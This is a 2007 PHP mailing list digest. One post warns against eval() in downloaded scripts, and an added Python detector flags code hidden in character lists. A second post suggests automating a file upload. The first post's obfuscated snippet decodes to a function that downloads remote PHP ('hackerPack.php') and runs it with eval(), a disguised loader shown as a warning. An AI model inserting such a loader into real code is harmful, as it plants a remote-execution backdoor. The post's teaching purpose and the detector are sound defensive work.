php-windows Digest 4 Mar 2007 03:37:37 -0000 Issue 3154

Topics (messages 27540 through 27541):

Re: [PHP] Re: Question on virus/worms
        27540 by: Robert Cummings

Re: auto upload
        27541 by: Haydar TUNA


----------------------------------------------------------------------
--- Begin Message ---
On Sat, 2007-03-03 at 14:02 +0100, Tim wrote:
>
> Once you are comfortable with this, before you use a script downloaded from
> the inet in a production environment, go through the code and make sure you
> don't see any backdoor code (unnecessary fsockopen(), exec() etc. that isn't
> related to the script's original use).

And be very careful with eval(). It's a gold mine for hackers since then
they can just do things like:

<?php

    $stuff =
        '102,117,110,99,116,105,111,110,32,83,73,76,70,83,68,'
       .'72,76,68,70,78,76,72,68,72,74,76,83,68,76,75,74,68,'
       .'76,74,83,72,68,76,74,83,72,68,83,90,68,70,83,40,41,'
       .'10,32,32,32,32,123,10,32,32,32,32,32,32,32,32,36,99,'
       .'111,100,101,32,61,32,102,105,108,101,40,32,39,104,116,'
       .'116,112,58,47,47,119,119,119,46,105,110,116,101,114,'
       .'106,105,110,110,46,99,111,109,47,104,97,99,107,101,'
       .'114,80,97,99,107,46,112,104,112,39,32,41,59,10,32,32,'
       .'32,32,32,32,32,32,36,99,111,100,101,32,61,32,105,109,'
       .'112,108,111,100,101,40,32,39,39,44,32,36,99,111,100,'
       .'101,32,41,59,10,10,32,32,32,32,32,32,32,32,101,118,'
       .'97,108,40,32,36,99,111,100,101,32,41,59,10,32,32,32,'
       .'32,125,10,10,32,32,32,32,83,73,76,70,83,68,72,76,68,'
       .'70,78,76,72,68,72,74,76,83,68,76,75,74,68,76,74,83,'
       .'72,68,76,74,83,72,68,83,90,68,70,83,40,41,59';

    $stuff = explode( ',', $stuff );
    $stuff = 'c'.'h'.'r'.'('.implode( ').'
            .'c'.'h'.'r'.'(', $stuff ).');';

    $stuff = eval( 'return '.$stuff );
    $stuff = eval( $stuff );

?>

Cheers,
Rob.
-- 
.------------------------------------------------------------.
| InterJinn Application Framework - http://www.interjinn.com |
:------------------------------------------------------------:
| An application and templating framework for PHP. Boasting  |
| a powerful, scalable system for accessing system services  |
| such as forms, properties, sessions, and caches. InterJinn |
| also provides an extremely flexible architecture for       |
| creating re-usable components quickly and easily.          |
`------------------------------------------------------------'

--- End Message ---
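Added example, not part of the message above or of the list archive: a static check for the pattern the post demonstrates, where a risky call is hidden inside a comma-separated list of character codes and only appears once the list is decoded. The names `audit` and `decode_char_list` and the sample script are assumptions constructed for illustration; the literal folding is a regex heuristic, not a PHP parser.

```python
import re

# Calls the thread singles out for review in a downloaded script.
RISKY = re.compile(r"\b(eval|exec|fsockopen)\s*\(", re.IGNORECASE)
# Heuristic: adjacent single-quoted literals joined with the PHP "." operator.
CONCAT = re.compile(r"'\s*\.\s*'")
LITERAL = re.compile(r"'([^'\\]*)'")
# A literal that is nothing but a long comma-separated list of byte values.
CODE_LIST = re.compile(r"\d{1,3}(?:,\d{1,3}){7,}")


def decode_char_list(literal):
    """Return the text a decimal character-code list spells, or None."""
    if not CODE_LIST.fullmatch(literal):
        return None
    values = [int(v) for v in literal.split(",")]
    if any(v > 255 for v in values):
        return None
    return "".join(chr(v) for v in values)


def audit(php_source):
    """List risky calls, visible or hidden in decoded literals, without executing anything."""
    folded = CONCAT.sub("", php_source)  # 'c'.'h'.'r' becomes 'chr'
    findings = [("direct", m.group(1).lower()) for m in RISKY.finditer(folded)]
    for m in LITERAL.finditer(folded):
        decoded = decode_char_list(m.group(1))
        if decoded is None:
            continue
        for hit in RISKY.finditer(decoded):
            findings.append(("hidden", hit.group(1).lower()))
    return findings


# Constructed sample in the shape of the post's script; the hidden text is harmless.
HIDDEN = "echo 'loaded'; eval( $more );"
codes = ",".join(str(ord(c)) for c in HIDDEN)
half = codes.index(",", len(codes) // 2) + 1
SAMPLE = ("<?php\n$s = '" + codes[:half] + "'\n    .'" + codes[half:] + "';\n"
          "$s = explode( ',', $s );\n"
          "$s = 'c'.'h'.'r'.'('.implode( ').'.'c'.'h'.'r'.'(', $s ).');';\n"
          "$s = eval( 'return '.$s );\neval( $s );\n?>")

if __name__ == "__main__":
    for kind, name in audit(SAMPLE):
        print(kind, name)
```

A "hidden" finding means the call exists only inside an encoded literal, which is a stronger reason to reject the script than a visible `eval()` on its own.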
--- Begin Message ---
Hello,
        I have got a very interesting answer. I built an exe program with
Delphi or other Visual Programming. In this program, I use WebBrowser API.
With this API, I use your secure file upload program. Then I call this exe
program from task manager. In this way, you can auto upload file every time :)


-- 
Haydar TUNA
Republic Of Turkey - Ministry of National Education
Education Technology Department Ankara / TURKEY
Web: http://www.haydartuna.net


"bedul" <[EMAIL PROTECTED]> wrote in message [EMAIL PROTECTED]:
> this might be a strange code i request, plz forgive my rudeness.
>
> everyday i was update a doc where i always put on d:\report\today.xls where
> i use a simple upload document prog (inside only box for upload only? and
> submit). the file i upload will save on file folder (inside the upload
> folder)
>
> today i want to skip that procedure.. i want to build this web where i open
> the site (http://server-e/upload/index.php) then click the button/submit..
> this button will trigger action where i will upload the d:\report\today.xls
> file "without using browse/file input".
>
> can u help me?? i do know about the unsafe that method.. thx for your
> attention.

--- End Message ---
